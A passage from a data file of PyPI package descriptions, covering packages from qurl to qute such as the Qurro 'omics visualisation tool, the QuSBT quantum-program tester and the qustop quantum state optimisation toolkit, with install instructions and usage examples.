follows:.\n\u251c\u2500\u2500 LICENCE\n\u251c\u2500\u2500 Makefile\n\u251c\u2500\u2500 README.md\n\u251c\u2500\u2500 qurix\n\u2502 \u2514\u2500\u2500 \n\u2502 \u2514\u2500\u2500 \n\u2502 \u251c\u2500\u2500 __init__.py\n\u2502 \u251c\u2500\u2500 __version__.py\n\u2502 \u2514\u2500\u2500 \n\u251c\u2500\u2500 requirements.txt\n\u251c\u2500\u2500 setup.py\n\u2514\u2500\u2500 tests\n \u251c\u2500\u2500 __init__.py\n \u2514\u2500\u2500 test_module.pyVersioning and releasePackage versions will be identified according tosemantic versioning. The release process will deploy in bothTest PyPIandPyPI.%%{init: { 'logLevel': 'debug', 'theme': 'base', 'gitGraph': {'rotateCommitLabel': true}} }%%\ngitGraph\n commit\n branch staging\n branch feat/some-feature\n checkout feat/some-feature\n commit\n commit\n checkout staging\n merge feat/some-feature id: \"Rel. Test PyPI 0\" tag: \"v0.1.0rc0\"\n checkout main\n merge staging id: \"Rel. PyPI 0\" tag: \"v0.1.0\"\n branch fix/some-fix\n checkout fix/some-fix\n commit\n checkout staging\n merge fix/some-fix id: \"Rel. Test PyPI 1\" tag: \"v0.1.1rc0\"\n checkout main\n merge staging id: \"Rel. PyPI 1\" tag: \"v0.1.1\"DeploymentAutomatic deployments via Github Actions. See.github/worfklows/"} +{"package": "qurl", "pacakge-description": "qurlPython sibling of the Haskell ourl projecthttps://github.com/nosarthur/ourl"} +{"package": "qurpc", "pacakge-description": "qurpcRPC for QuLab"} +{"package": "qurro", "pacakge-description": "Qurro: Quantitative Rank/Ratio Observations(Pronounced \"churro.\")What does this tool do?Lots of tools for analyzing \" 'omic\" datasets can producefeature rankings. These rankings can be used as a guide to look at thelog-ratiosof certain features in a dataset. Qurro is a tool for visualizing and exploring both of these types of data.What are feature rankings?The term \"feature rankings\" includesdifferentials, which we define as the estimated log-fold changes for features' abundances across different sample types. You can get this sort of output from lots of \"differential abundance\" tools, including but definitely not limited toALDEx2,Songbird,Corncob,DESeq2,edgeR, etc.The term \"feature rankings\" also includesfeature loadingsin abiplot(seeAitchison and Greenacre 2002); you can get biplots from runningDEICODE,\nwhich is a tool that works well with microbiome datasets, or from a variety of other methods.Differentials and feature loadings alike can be interpreted as rankings -- you\ncan sort them numerically to \"rank\" features based on their association with\nsome sort of variation in your dataset.What can we do with feature rankings?A common use of these rankings is examining thelog-ratiosof\nparticularly high- or low-ranked features across the samples in your dataset,\nand seeing how these log-ratios relate to your sample metadata (e.g. \"does\nthis log-ratio differ between 'healthy' and 'sick' samples?\"). For\ndetails as to why this approach is useful, check outthis open access paper.How does this tool help?Qurro is an interactive web application for visualizing feature rankings\nand log-ratios.It does this\nusing a two-plot interface: on the left side of the screen, a \"rank plot\" shows\nhow features are ranked for a selected ranking, and on the right side of the\nscreen a \"sample plot\" shows the log-ratios of selected features' abundances\nwithin samples. There are a variety of controls available for selecting\nfeatures for a log-ratio, and changing the selected log-ratio updates both the\nrank plot (highlighting selected features) and the sample plot (changing the\ny-axis value of each sample to match the selected log-ratio).A paper describing Qurro is now available at NAR Genomics and Bioinformaticshere.How do I use this tool?Qurro can be used standalone (as a Python 3 script that generates a\nfolder containing a HTML/JS/CSS visualization) or as aQIIME 2plugin (that generates a QZV file that can be\nvisualized atview.qiime2.orgor by usingqiime tools view).Qurro is still being developed, so backwards-incompatible changes might\noccur. If you have any bug reports, feature requests, questions, or if you just\nwant to yell at me, then feel free toopen an issuein this repository!DemosSee theQurro websitefor a list of\ninteractive demos using real datasets.Screenshot: Visualizing KEGG orthologs in metagenomic data from the Red SeaThis visualization (which uses data fromthis study, with\ndifferentials generated bySongbird)\ncan be viewed onlinehere.Installation and UsageYou can install Qurro usingpiporconda.System requirementsIf you're using Qurro within QIIME 2,you will need a QIIME 2 version of at\nleast 2020.11.If you're using Qurro outside of QIIME 2,you will need a Python version of\nat least 3.6 and less than 3.10.In either case, Qurro should work with most modern web browsers; Firefox or Chrome are\nrecommended.Installing withpippipinstallcython\"numpy >= 1.12.0\"pipinstallqurroInstalling withcondacondainstall-cconda-forgequrroTemporary CaveatCertain characters in column names in the sample metadata, feature metadata (if passed), and feature differentials (if passed) will be replaced with similar characters or just removed entirely:Old Character(s)New Character.:])[(\\|'or\"NothingThis is due to some downstream issues with handling these sorts of characters\nin field names. Seethis issuefor context.TutorialsIn-depth tutorialsThese tutorials are all good places to start, depending on what sort of data and\nfeature rankings you have.Color Composition tutorialData Summary:Color composition data from abstract paintingsFeature rankings: Feature loadings in an arbitrary compositional biplotQurro used through QIIME 2 or standalone?: Standalone\"Moving Pictures\" tutorialData Summary:Microbiome 16S rRNA marker gene sequencing data from four types of body site samplesFeature rankings: Feature loadings in aDEICODEbiplotQurro used through QIIME 2 or standalone?: QIIME 2Transcriptomics tutorialData Summary:Gene expression (\"RNA-Seq\") data from TCGA tumor and \"solid tissue normal\" samplesFeature rankings:ALDEx2differentialsQurro used through QIIME 2 or standalone?: StandaloneSelection tutorialThere are a lot of different ways to select features in Qurro, and the\ninterface can be difficult to get used to. This document describes all of these\nmethods, and provides some examples of where they could be useful in practice.Selection tutorialBasic command-line tutorialsThese tutorials show examples of using Qurro in identical ways both inside and\noutside of QIIME 2.Sleep Apnea tutorialFeature rankings: feature loadings in aDEICODEbiplotRed Sea tutorialFeature rankings:SongbirddifferentialsQarcoalQarcoal(pronounced \"charcoal\") is a new part of Qurro that lets you\ncompute log-ratios based on taxonomic searching directly from the command-line.\nThis can be useful for a variety of reasons.Currently, Qarcoal is only available through Qurro's QIIME 2 plugin interface.\nPlease seeqarcoal_example.ipynbfor a demonstration of using Qarcoal.PosterWe presentedthis posteron Qurro at the2019 CRISP Annual Review.\nThe data shown here is already slightly outdated compared to the actual Qurro paper (e.g. the differentials are slightly different), but feel free to check out the poster anyway!AcknowledgementsDependenciesCode files for the following projects are distributed withinqurro/support_files/vendor/.\nSee thequrro/dependency_licenses/directory for copies of these software projects'\nlicenses (each of which includes a respective copyright notice).VegaVega-LiteVega-EmbedjQueryDataTablesRequireJSBootstrapBootstrap IconsWe make use of the \"Question fill\" icon's SVG, as well as some example code\nfor embedding this or other icons in CSS.Popper.js(included within the Bootstrap JS \"bundle\" file)The following software projects are required for Qurro's python code\nto function, although they are not distributed with Qurro (and are\ninstead installed alongside Qurro).Altairbiom-formatclickNumPypandasscikit-bioTesting DependenciesFor python testing/style checking, Qurro usespytest,pytest-cov,flake8, andblack. You'll also need to have QIIME 2\ninstalled to run most of the python tests (note that, due to click vs. black\nvs. QIIME 2 dependency issues, you should use a QIIME 2 environment of at least\n2022.8; seeCONTRIBUTING.mdfor details).For JavaScript testing/style checking, Qurro usesMocha,Chai,mocha-headless-chrome,nyc,jshint,\nandprettier.Qurro also usesTravis-CIandCodecov.The Jupyter notebooks in Qurro'sexample_notebooks/folder are automatically\nrerun usingnbconvert,\nalso.Data SourcesThe test data located inqurro/tests/input/mackerel/were exported from\nQIIME 2 artifacts inthis repository. These data are from Minich et al. 2020 [1].The test data located inqurro/tests/input/byrd/are fromthis repository.\nThese data, in turn, originate from Byrd et al.'s 2017 study on atopic\ndermatitis [2].The test data located inqurro/tests/input/sleep_apnea/(and inexample_notebooks/DEICODE_sleep_apnea/input/)\nare fromthis Qiita study,\nwhich is associated with Tripathi et al.'s 2018 study on sleep apnea [4].The test data located inqurro/tests/input/moving_pictures/(and inexample_notebooks/moving_pictures/data/)\nare fromthe QIIME 2 moving pictures tutorial.\nTheordinationfiles in these folders were computed based on theDEICODE moving pictures tutorial.\nThese data (sans the DEICODE ordination) are associated with Caporaso et al. 2011 [5].Lastly, the data located inqurro/tests/input/red_sea(and inexample_notebooks/songbird_red_sea/input/, and shown in the\nscreenshot above) were taken from Songbird's GitHub repository in itsdata/redsea/folder, and are associated with Thompson et al. 2017 [3].LogoQurro's logo was created using theLalezarfont.\nAlso, shout out tothis gistfor showing how to center images in GitHub markdown files (which is more of a hassle than it sounds).Special ThanksThe design of Qurro was strongly inspired byEMPerorandq2-emperor, along withDEICODE. A big shoutout to\nYoshiki V\u00e1zquez-Baeza for his help in planning this project, as well as to\nCameron Martino for a ton of work on getting the code in a distributable state\n(and making it work with QIIME 2). Thanks also to Jamie Morton, who wrote the\noriginal code for producing rank and sample plots from which this is derived.And thanks to a bunch of the Knight Lab for helping name the tool :)Citing QurroIf you use Qurro in your research, please cite it!\nThe preferred citation for Qurro isthis manuscript at NAR Genomics and\nBioinformatics.\nHere's the BibTeX:@article {fedarko2020,\n author = {Fedarko, Marcus W and Martino, Cameron and Morton, James T and Gonz\u00e1lez, Antonio and Rahman, Gibraan and Marotz, Clarisse A and Minich, Jeremiah J and Allen, Eric E and Knight, Rob},\n title = \"{Visualizing\u00a0\u2019omic feature rankings and log-ratios using Qurro}\",\n journal = {NAR Genomics and Bioinformatics},\n volume = {2},\n number = {2},\n year = {2020},\n month = {04},\n issn = {2631-9268},\n doi = {10.1093/nargab/lqaa023},\n url = {https://doi.org/10.1093/nargab/lqaa023},\n note = {lqaa023},\n eprint = {https://academic.oup.com/nargab/article-pdf/2/2/lqaa023/33137933/lqaa023.pdf},\n}References[1] Minich, J. J., Petrus, S., Michael, J. D., Michael, T. P., Knight, R., &\nAllen, E. E. (2020). Temporal, environmental, and biological drivers of the\nmucosal microbiome in a wild marine fish, Scomber japonicus.mSphere, 5(3),\ne00401-20.Link.[2] Byrd, A. L., Deming, C., Cassidy, S. K., Harrison, O. J., Ng, W. I., Conlan, S., ... & NISC Comparative Sequencing Program. (2017). Staphylococcus aureus and Staphylococcus epidermidis strain diversity underlying pediatric atopic dermatitis.Science Translational Medicine, 9(397), eaal4651.Link.[3] Thompson, L. R., Williams, G. J., Haroon, M. F., Shibl, A., Larsen, P.,\nShorenstein, J., ... & Stingl, U. (2017). Metagenomic covariation along densely\nsampled environmental gradients in the Red Sea.The ISME Journal, 11(1), 138.Link.[4] Tripathi, A., Melnik, A. V., Xue, J., Poulsen, O., Meehan, M. J., Humphrey, G., ... & Haddad, G. (2018). Intermittent hypoxia and hypercapnia, a hallmark of obstructive sleep apnea, alters the gut microbiome and metabolome.mSystems, 3(3), e00020-18.Link.[5] Caporaso, J. G., Lauber, C. L., Costello, E. K., Berg-Lyons, D., Gonzalez, A., Stombaugh, J., ... & Gordon, J. I. (2011). Moving pictures of the human microbiome.Genome Biology, 12(5), R50.Link.LicenseThis tool is licensed under theBSD 3-clause license.\nOur particular version of the license is based onscikit-bio'slicense."} +{"package": "qurry", "pacakge-description": "QurryQurry is a prototype of a quantum probabilistic programming language, done with theunitary fund.\nThe official project duration is one year, but the language may be usable before then (and in fact, can already be used to use all of the QUIL spec with some useful abstractions on top, like if statements, variable names, and so on).For more information on the progress of the project, see asummary(from early October), or an in-progresspaper.If you use Qurry or are influenced by it, all I ask is that you cite the software. A bibtex citation is available at the end of this file.\nOnce a paper is published, please cite that (I will update it here).Since Qurry is currently in major rework (untilSeptember 16th, 2019), the instructions and description previously available on this readme have been commented out.@misc{saldyt_2018, title={Qurry, a probabilistic quantum programming language}, url={https://github.com/LSaldyt/qurry}, journal={GitHub}, author={Saldyt, Lucas}, year={2018}, month={Nov}}"} +{"package": "quru", "pacakge-description": "Quru in one sentenceQuru is a python workflow framework to easily swarm up a bunch of workers to streamly process tasks.What \"Quru\" means?Quru (Chinese \u77bf\u5982, pronounce keeru) is a bird-like beast with human face and three feet, initially described in Shan Hai Jing, a classic book that describes mythic geography and beasts.How to run demoYou will need to setup a rabbitmq and redis instances to get Quru running. A docker compose file for quick setup is provided indemofolder.\n0. Git clone this repo and add the current path to yourPYTHONPATHenvironment variables.In your terminal,cdto the demo folder.Runmake run-infrato get rabbitmq and redis running.Runpython worker.py. This instance starts the worker that handles tasks.Runpython sender.py. This instance periodically dispatches tasks to worker."} +{"package": "qusbt", "pacakge-description": "QuSBT: Search-Based Testing of Quantum ProgramsDescriptionGenerating a test suite for a quantum program such that it has the maximum number of failing tests is an optimization problem. For such optimization, search-based testing has shown promising results in the context of classical programs. To this end, we present a test generation tool for quantum programs based on a genetic algorithm, called QuSBT (Search-based Testing of Quantum Programs). QuSBT automates the testing of quantum programs, with the aim of finding a test suite having the maximum number of failing test cases. QuSBT utilizes IBM's Qiskit as the simulation framework for quantum programs. We present the tool architecture in addition to the implemented methodology (i.e., the encoding of the search individual, the definition of the fitness function expressing the search problem, and the test assessment w.r.t. two types of failures). Finally, we report results of the experiments in which we tested a set of faulty quantum programs with QuSBT to assess its effectiveness.How to use QuSBT?Quantum Program FileThe quantum program should be written with Qiskit.The code has to be structured in a function named as 'run' with one parameter that refers to the quantum circuit.Users only need to add gates to the circuit and measure output qubits to get the output. They don't need to set any register, initialize circuits, choose the simulation, or execute the circuits in 'run' function.Program SpecificationFor each input, there should be one or more than one outputs. The probability of occurrence of one output can be shown as a decimal with binary numbers of input-output pair, and the input and the output are separated by a comma.Here is one simple example:00,1=0.5\n00,0=0.5\n01,1=0.5\n01,0=0.5Specially, the dash symbol '-' represents both '0' and '1' for inputs and outputs, which means the example above can be expressed as below:0-,-=0.5Configuration FileThe configuration file should be written in an INI file.\nThe configuration file is described below.[program]\nroot=\n;(Required)\n;Description: The absolute root of your quantum program file.\nnum_qubit=\n;(Required)\n;Description: The total number of qubit of your quantum program.\ninputID=\n;(Required)\n;Description: The IDs of input qubits.\n;Format: A non-repeating sequence separated by commas.\noutputID=\n;(Required)\n;Description: The IDs of output qubits which are the qubits to be measured.\n;Format: A non-repeating sequence separated by commas.\n\n\n[qusbt_configuration]\nbeta=\n;(Optional)\n;Description: The percentage of possible inputs as the number of test cases in a test suite.\nM=\n;(Optional)\n;Description: The number of test cases in a test suite.\n;Attention: You should use either 'beta' or 'M'. We use 'beta' as 0.05 by default.\n\n\n[GA_parameter]\npopulation_size=\n;(Optional)\n;Description: The population size in GA, population_size=10 by default.\noffspring_population_size=\n;(Optional)\n;Description: The offspring population size in GA, offspring_population_size=10 by default.\nmax_evaluations=\n;(Optional)\n;Description: The maximum evaluations in GA, max_evaluations=500 by default.\nmutation_probability=\n;(Optional)\n;Description: mutation probability in GA, mutation_probability=1.0/M, 'M' is the size of a test suite by default.\nmutation_distribution_index=\n;(Optional)\n;Description: mutation distribution in GA, mutation_distribution_index=20 by default.\ncrossover_probability=\n;(Optional)\n;Description: crossover probability in GA, crossover_probability=0.9 by default.\ncrossover_distribution_index=\n;(Optional)\n;Description: crossover probability in GA, crossover_distribution_index=20 by default.\n\n\n[program_specification]\n;Description: The program specification.\n;Format:input string (binary),output string (binary)=probability\n;Example:\n;00,1=0.5\n;00,0=0.5\n;01,1=0.5\n;01,0=0.5\n;or\n;0-,-=0.5\n;Attention: '-' can refer to both '0' and '1'.Command Line OperationYou can provide the root of the configuration file and run QuSBT.from qusbt.qusbt_search import qusbt\n\nqusbt(\"configuration.ini\")QuSBT will assess the results according to the two test oracles that have been proposed inthis paper:uof: Whether an observed output is correct according to program specification. If not, the program is failed;wodf: If all the observed outputs corresponding to an input are valid, then it compares their observed probabilities with the ones specified in the Program Specification file. If the differences are statistically significant (i.e., a p-value lower than the chosen significance level), the program is failed.After running, you get one Excel file containing solution and iteration informationVideo DemonstrationA video demo is availablehere.Experimental DataExperimental data including quantum programs, and program specifications can be downloadedhere.ExtensionOne can checkout the code from GitHub and provide extensions to QuSBT.PaperX. Wang, P. Arcaini, T. Yue, S. Ali. QuSBT: Search-Based Testing of Quantum Programs. In 2022 IEEE/ACM 44th International Conference on Software Engineering: Companion Proceedings (ICSE-Companion) [doi]"} +{"package": "qusbt-gpu", "pacakge-description": "QuSBT: Search-Based Testing of Quantum ProgramsDescriptionGenerating a test suite for a quantum program such that it has the maximum number of failing tests is an optimization problem. For such optimization, search-based testing has shown promising results in the context of classical programs. To this end, we present a test generation tool for quantum programs based on a genetic algorithm, called QuSBT (Search-based Testing of Quantum Programs). QuSBT automates the testing of quantum programs, with the aim of finding a test suite having the maximum number of failing test cases. QuSBT utilizes IBM's Qiskit as the simulation framework for quantum programs. We present the tool architecture in addition to the implemented methodology (i.e., the encoding of the search individual, the definition of the fitness function expressing the search problem, and the test assessment w.r.t. two types of failures). Finally, we report results of the experiments in which we tested a set of faulty quantum programs with QuSBT to assess its effectiveness.How to use QuSBT?Quantum Program FileThe quantum program should be written with Qiskit.The code has to be structured in a function named as 'run' with one parameter that refers to the quantum circuit.Users only need to add gates to the circuit and measure output qubits to get the output. They don't need to set any register, initialize circuits, choose the simulation, or execute the circuits in 'run' function.Program SpecificationFor each input, there should be one or more than one outputs. The probability of occurrence of one output can be shown as a decimal with binary numbers of input-output pair, and the input and the output are separated by a comma.Here is one simple example:00,1=0.5\n00,0=0.5\n01,1=0.5\n01,0=0.5Specially, the dash symbol '-' represents both '0' and '1' for inputs and outputs, which means the example above can be expressed as below:0-,-=0.5Configuration FileThe configuration file should be written in an INI file.\nThe configuration file is described below.[program]\nroot=\n;(Required)\n;Description: The absolute root of your quantum program file.\nnum_qubit=\n;(Required)\n;Description: The total number of qubit of your quantum program.\ninputID=\n;(Required)\n;Description: The IDs of input qubits.\n;Format: A non-repeating sequence separated by commas.\noutputID=\n;(Required)\n;Description: The IDs of output qubits which are the qubits to be measured.\n;Format: A non-repeating sequence separated by commas.\n\n\n[qusbt_configuration]\nbeta=\n;(Optional)\n;Description: The percentage of possible inputs as the number of test cases in a test suite.\nM=\n;(Optional)\n;Description: The number of test cases in a test suite.\n;Attention: You should use either 'beta' or 'M'. We use 'beta' as 0.05 by default.\n\n\n[GA_parameter]\npopulation_size=\n;(Optional)\n;Description: The population size in GA, population_size=10 by default.\noffspring_population_size=\n;(Optional)\n;Description: The offspring population size in GA, offspring_population_size=10 by default.\nmax_evaluations=\n;(Optional)\n;Description: The maximum evaluations in GA, max_evaluations=500 by default.\nmutation_probability=\n;(Optional)\n;Description: mutation probability in GA, mutation_probability=1.0/M, 'M' is the size of a test suite by default.\nmutation_distribution_index=\n;(Optional)\n;Description: mutation distribution in GA, mutation_distribution_index=20 by default.\ncrossover_probability=\n;(Optional)\n;Description: crossover probability in GA, crossover_probability=0.9 by default.\ncrossover_distribution_index=\n;(Optional)\n;Description: crossover probability in GA, crossover_distribution_index=20 by default.\n\n\n[program_specification]\n;Description: The program specification.\n;Format:input string (binary),output string (binary)=probability\n;Example:\n;00,1=0.5\n;00,0=0.5\n;01,1=0.5\n;01,0=0.5\n;or\n;0-,-=0.5\n;Attention: '-' can refer to both '0' and '1'.Command Line OperationYou can provide the root of the configuration file and run QuSBT.from qusbt.qusbt_search import qusbt\n\nqusbt(\"configuration.ini\")QuSBT will assess the results according to the two test oracles that have been proposed inthis paper:uof: Whether an observed output is correct according to program specification. If not, the program is failed;wodf: If all the observed outputs corresponding to an input are valid, then it compares their observed probabilities with the ones specified in the Program Specification file. If the differences are statistically significant (i.e., a p-value lower than the chosen significance level), the program is failed.After running, you get one Excel file containing solution and iteration informationVideo DemonstrationA video demo is availablehere.Experimental DataExperimental data including quantum programs, and program specifications can be downloadedhere.ExtensionOne can checkout the code from GitHub and provide extensions to QuSBT.PaperX. Wang, P. Arcaini, T. Yue, S. Ali. QuSBT: Search-Based Testing of Quantum Programs. In 2022 IEEE/ACM 44th International Conference on Software Engineering: Companion Proceedings (ICSE-Companion) [doi]"} +{"package": "qushiqyukla", "pacakge-description": "No description available on PyPI."} +{"package": "qusi", "pacakge-description": "qusi (formerly RAMjET)qusiis a framework for producing neural networks to characterize phenomena in astrophysical photometric data.See here for documentation."} +{"package": "qusimulator", "pacakge-description": "Qusimulator \u2013 A quantum computing simulatorRelease 2.2$ pip install qusimulatorNow full support for quantum noise simulation.Includes state-vector and density-matrix based simulators.Documentation and example code resources -Example implementations of various quantum algorithmsDeveloper documentation"} +{"package": "qusource", "pacakge-description": "QusourceQuantum circuit simulator"} +{"package": "quspin-qite", "pacakge-description": "QITE_CDQITE inspired cd drivingusageimportquspinimportquspin_qiterun the codecdexamples/QITEpythonrun_qite.py# python run_vqite.pyacknowledgeThe implementation are adapted fromhttps://github.com/mariomotta/QITE/blob/master/code_v4/qite.pyandhttps://github.com/Plmono/RL-qite/blob/main/gym_cut/envs/foo_env.py#L84-L142"} +{"package": "quspin-vqa", "pacakge-description": "VQAGeneral purpose variational quantum algorithmsIntroductionVQA tries to unifies the variational quantum algorithm algother and provide a scalarable solution to develop VQA.Installinstall the latest version of the package.$pipinstallquspin_vqaor install locally$pipinstall-e.Before installing this package, make surequspinis installedcheckout the detailed installationherecondainstall-cweinbe58quspinUsageimportquspinimportvqarun the code / examples$cdexamples/QAOA\n$pythonrun.py"} +{"package": "qustop", "pacakge-description": "QUSTOPNOTE: Thequstoppackage is still is under development.Thequstop(QUantum STate OPtimizer) package is a Python toolkit for studying\nvarious quantum state optimization scenarios including calculating optimal\nvalues for quantum state distinguishability, quantum state exclusion, quantum\nstate cloning, and more.ApplicationsThequstoppackage can be used to:Calculate and approximate optimal probabilities of distinguishing quantum\nstates over positive, PPT, and separable measurements with either minimum-error\nor unambiguously.Calculate and approximate optimal probabilities of excluding quantum states\nwith either minimum-error or unambiguously.InstallationSee theinstallation guide.UsageSee thedocumentation.ExamplesFor more examples, please consultqustop/examplesas well as thequstopintroductory\ntutorial.Quantum state distinguishabilityFurther examples on quantum state distinguishability can be found in thequstop/examples/opt_distdirectory.Consider the following Bell states:We will be using these states to consider a number of applications in the realm\nof quantum state distinguishability.Distinguishing two orthogonal statesA result ofarXiv:0007098states that\nany two orthogonal pure states can be distinguished perfectly by LOCC\nmeasurements. As the optimal probability of distinguishing via LOCC\nmeasurements is a lower bound on positive, PPT, separable, etc., we should\nexpect to also see a value of1to indicate perfect probability of\ndistinguishing.fromtoqito.statesimportbellfromqustopimportState,Ensemble,OptDistdims=[2,2]states=[State(bell(0)*bell(0).conj().T,dims),State(bell(1)*bell(1).conj().T,dims)]probs=[1/2,1/2]ensemble=Ensemble(states,probs)sep_res=OptDist(ensemble,\"sep\",\"min-error\")sep_res.solve()ppt_res=OptDist(ensemble,\"ppt\",\"min-error\")ppt_res.solve()pos_res=OptDist(ensemble,\"pos\",\"min-error\")pos_res.solve()Checking the respective values of the solved instances, we see that all of the\nvalues are equal to one, which indicate that the two pure states are indeed\nperfectly distinguishable under PPT, separable, and positive measurements.>>>print(pos_res.value)0.9999999999384911>>>print(ppt_res.value)1.0000000047560667>>>print(sep_res.value)0.9999999995278338Four indistinguishable orthogonal maximally entangled statesIt was shown inarXiv:1205.1031and later\nextended inarXiv:1307.3232that for the\nfollowing set of statesthat the optimal probability of distinguishing via a PPT measurement should\nyield an optimal probability of 7/8.importnumpyasnpfromtoqito.statesimportbellfromqustopimportState,Ensemble,OptDistdims=[2,2,2,2]rho_0=np.kron(bell(0),bell(0))*np.kron(bell(0),bell(0)).conj().Trho_1=np.kron(bell(2),bell(1))*np.kron(bell(2),bell(1)).conj().Trho_2=np.kron(bell(3),bell(1))*np.kron(bell(3),bell(1)).conj().Trho_3=np.kron(bell(1),bell(1))*np.kron(bell(1),bell(1)).conj().Tensemble=Ensemble([State(rho_0,dims),State(rho_1,dims),State(rho_2,dims),State(rho_3,dims)])sd=OptDist(ensemble,\"ppt\",\"min-error\")sd.solve()Indeed the optimal value obtained viaqustopis equal to 7/8:# 7/8 \\approx 0.875>>>print(sd.value)0.8749769201568257It was also shown inarXiv:1205.1031that the optimal\nprobability of distinguishing amongst these same state unambiguously via PPT measurements was\nequal to 3/4.sd=OptDist(ensemble,\"ppt\",\"unambiguous\")sd.solve()# 3/4 = 0.75>>>print(sd.value)0.749999999939434Entanglement cost of distinguishing Bell statesOne may ask whether the ability to distinguish a state can be improved by\nmaking use of an auxiliary resource state.,for some \u03b5 in [0, 1].It was shown inarXiv:1408.6981that the\nprobability of distinguishing four Bell states with a resource state via PPT\nmeasurements or separable measurements is given by the closed-form expressionwhere the ensemble is defined asUsingqustop, we may encode this scenario as follows.importnumpyasnpfromtoqito.statesimportbasis,bellfromqustopimportState,Ensemble,OptDiste_0,e_1=basis(2,0),basis(2,1)eps=0.5tau=np.sqrt((1+eps)/2)*np.kron(e_0,e_0)+np.sqrt((1-eps)/2)*np.kron(e_1,e_1)dims=[2,2,2,2]states=[State(np.kron(bell(0),tau),dims),State(np.kron(bell(1),tau),dims),State(np.kron(bell(2),tau),dims),State(np.kron(bell(3),tau),dims),]probs=[1/4,1/4,1/4,1/4]ensemble=Ensemble(states,probs)sep_res=OptDist(ensemble,\"sep\",\"min-error\")sep_res.solve()ppt_res=OptDist(ensemble,\"ppt\",\"min-error\")ppt_res.solve()eq=1/2*(1+np.sqrt(1-eps**2))Note that when we print out the optimal values for both separable and PPT\nmeasurements that the values obtained agree with the closed form expression.>>>print(eq)0.9330127018922193>>>print(ppt_res.value)0.933010488554166>>>print(sep_res.value)0.9330124607534689It was also shown inarXiv:1408.6981that\nthe closed-form probability of distinguishing three Bell states with a resource\nstate using separable measurements to be given by the closed-form expression:where the ensemble is defined asUsingqustop, we may encode this scenario as follows.importnumpyasnpfromtoqito.statesimportbasis,bellfromqustopimportState,Ensemble,OptDiste_0,e_1=basis(2,0),basis(2,1)eps=0.5tau=np.sqrt((1+eps)/2)*np.kron(e_0,e_0)+np.sqrt((1-eps)/2)*np.kron(e_1,e_1)dims=[2,2,2,2]states=[State(np.kron(bell(0),tau),dims),State(np.kron(bell(1),tau),dims),State(np.kron(bell(2),tau),dims),]probs=[1/3,1/3,1/3]ensemble=Ensemble(states,probs)sep_res=OptDist(ensemble,\"sep\",\"min-error\",level=2)sep_res.solve()eq=1/3*(2+np.sqrt(1-eps**2))Pritning the values of both the closed-form equation and the value obtained via\nthe SDP, we obtain:>>>print(sep_res.value)0.9583057987150858>>>print(eq)0.9553418012614794Note that the value ofsep_res.valueis actually a bit higher thaneq. This\nis because the separable value is calculated by a hierarchy of SDPs. At low\nlevels of the SDP, the problem can often converge to the optimal value, but\nother times it is necessary to compute higher levels of the SDP to eventually\narrive at the optimal value. While this is intractable in general, in practice,\nthe SDP can often converge or at least get fairly close to the optimal value\nfor small problem sizes.Werner hiding pairsInarXiv:0011042andarXiv:0103098a quantum data hiding\nprotocol that encodes a classical bit in a Werner hiding pair was provided.A Werner hiding pair is defined aswhereis the swap operator defined for some dimension n >= 2.It was show inhdl:10012/9572thatwhere the ensemble is defined asUsingqustop, we may encode this scenario as follows.importnumpyasnpfromtoqito.permsimportswap_operatorfromqustopimportEnsemble,State,OptDistdim=2sigma_0=(np.kron(np.identity(dim),np.identity(dim))+swap_operator(dim))/(dim*(dim+1))sigma_1=(np.kron(np.identity(dim),np.identity(dim))-swap_operator(dim))/(dim*(dim-1))states=[State(sigma_0,[2,2]),State(sigma_1,[2,2])]ensemble=Ensemble(states)expected_val=1/2+1/(dim+1)sd=OptDist(ensemble=ensemble,dist_measurement=\"ppt\",dist_method=\"min-error\",eps=1e-8)sd.solve()We can verify that the closed-form expression matches that of the value\nreturned fromqustop.print(sd.value)0.8333333333668715print(expected_val)0.8333333333333333State exclusionThe primary difference between the quantum state distinguishability\nscenario and the quantum state exclusion scenario is that in the former,\nBob want to guess which state he was given, and in the latter, Bob wants to\nguess which state he wasnotgiven.State cloning(Coming soon).LicenseGNU GPL v.3.0."} +{"package": "quta", "pacakge-description": "qutaQuadratically optimizedThrustAllocationquta is an open source python package leveraging the optimization technique quadratic programming for allocation of thrust to thrusters fixed on a body in the plane (3DOFs).Example usage:from quta.thruster import AzimuthThruster\nfrom quta.allocator import MinimizePowerAllocator\n\naz1 = AzimuthThruster((-20, 5), 10000, 32)\naz2 = AzimuthThruster((-20, -5), 10000, 32)\n\na = MinimizePowerAllocator()\n\na.add_thruster(az1)\na.add_thruster(az2)\n\nu, res = a.allocate([0, 500, 8000], relax=False)ToDoUpdate readmeDocumentation/examplesContributions welcome through pull requests!"} +{"package": "quTARANG", "pacakge-description": "quTARANGWelcome to quTARANG, a fast GPU enabled python solver to solve Gross-Pitaeskii equation.Capablities ofquTARANGIt is a solver developed to study turbulence in quantum systems specially in Bose-Einstein condensates. It can run on both GPU and CPU.The documentation of code is available atquTARANG.DependenciesquTARANGdepends on the following packages:numpycupy(If you want to use GPU)pathlibh5pymatplotlibInstllationYou can installquTARANGusingpippipinstallquTARANGHow to use:To run a simulation:Import the required librariesfromquTARANGimportxp,Params,GPESet the parametersCreate an instance of theParamsclass and set the parameters according to your need.\nThe parameters have been detailed in the documentation. Example:# Create an instance of the Params class for storing parameters.par=gpe.Params(N=[64,64,64],L=[16,16,16],g=0.1,dt=0.001,tmax=5,rms=[True,0,100])InitiateGPEclass\nCreate an instance of the GPE class by passing the Params instance created previously.# Create an instance of the GPE class.G=gpe.GPE(par)Set initial conditonYou can give initial condition in terms of wavefunction and potential by defining their functions and passing them to the functionset_init.# Set wavefunctionwfc=(1/xp.pi**(1/4))*xp.exp(-(x**2/2+y**2/2+z**2/2))# Set potentialpot=(x**2+y**2+z**2)/2G.set_init(wfc,pot)wfcfunction will be used to set the initial wavefunction andpotvariable will be used to set the initial potential.Start the simulation:G.evolve()The results are stored as hdf5 files in the cwd or the path set by the user in the Params instance."} +{"package": "qute", "pacakge-description": "#OverviewQute is a wrapped extension of Marcus Ottosson's Qt.py. The emphasis is on\nutilising the convience of Qt.py (allowing for use of PyQt, PySide and\nPySide2 seamlessly) whilst also exposing a set of common pieces of functionality\nwe tend to replicate and utilise in many places.#Key FeaturesGeneral UsageimportquteclassMyWidget(qute.QWidget):def__init__(self,parent=None):super(MyWidget,self).__init__(parent=parent)# -- Create a layout and set it as the base layout. Use# -- qute to slim the layout - removing marginsself.setLayout(qute.utilities.layouts.slimify(qute.QVBoxLayout()))# -- Create some widgetsself.spinner=qute.QSpinBox()self.checker=qute.QCheckBox()# -- Add these to our 